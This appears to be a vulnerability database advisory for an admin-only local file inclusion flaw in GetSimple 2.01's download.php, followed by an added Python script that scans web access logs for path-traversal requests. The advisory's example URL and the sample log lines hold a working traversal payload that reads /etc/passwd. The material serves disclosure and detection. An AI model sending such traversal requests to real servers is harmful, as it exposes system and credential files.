Vendor: GetSimple
By: Batch
CVSS: 7.5 (HIGH)
Local File Inclusion (LFI)
CWE: 22
Product Name: GetSimple
Affected Version From: 2.01
Affected Version To: 2.01
Patch Exists: YES
Related CWE: N/A
CPE: a:get-simple:get-simple:2.01
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010
GetSimple 2.01 LFI
A Local File Inclusion (LFI) vulnerability exists in GetSimple 2.01 that allows an attacker to read arbitrary files on the server. The attacker must be an admin to exploit it. The vulnerable code is in the download.php file, which reads the file whose path is passed in the 'file' parameter. For example, an attacker can read the /etc/passwd file by sending a request to http://localhost/GetSimple_2.01/admin/download.php?file=../../../../../etc/passwd.
Mitigation:
Upgrade to the latest version of GetSimple, which is not vulnerable to this attack.
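
Until the upgrade is in place, web server access logs can be reviewed for requests to download.php whose 'file' value leaves its starting directory. The following is an added example, not code from GetSimple or from the original advisory; it assumes a combined-format access log, assumes that legitimate requests pass relative paths that do not climb upward, and uses constructed log lines (the first reuses the request shown above).

```python
import posixpath
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumption: Apache/nginx "combined" access log format.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
ENDPOINT = "/admin/download.php"  # path suffix from the advisory's example URL

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so values encoded more than once are normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def escapes_base(file_param):
    """True if the 'file' value is absolute or resolves above its starting directory."""
    path = fully_decode(file_param).replace("\\", "/")
    if path.startswith("/") or "\x00" in path:
        return True
    normalised = posixpath.normpath(path)
    return normalised == ".." or normalised.startswith("../")

def suspicious_requests(log_lines):
    """Return (client_ip, decoded_file_value) for each flagged download.php request."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.endswith(ENDPOINT):
            continue
        for value in parse_qs(url.query).get("file", []):  # parse_qs decodes once
            if escapes_base(value):
                hits.append((line.split()[0], fully_decode(value)))
    return hits

# Constructed sample log lines (documentation IP range, made-up sizes and file names).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /GetSimple_2.01/admin/download.php?file=../../../../../etc/passwd HTTP/1.1" 200 1532',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /GetSimple_2.01/admin/download.php?file=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1532',
    '192.0.2.12 - - [01/Jan/2024:10:01:00 +0000] "GET /GetSimple_2.01/admin/download.php?file=backups/site.zip HTTP/1.1" 200 20480',
    '192.0.2.13 - - [01/Jan/2024:10:02:00 +0000] "GET /GetSimple_2.01/index.php?id=about HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for ip, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} requested file={value}")
```

Because exploitation requires an admin session, any hit also identifies an admin account whose use should be reviewed.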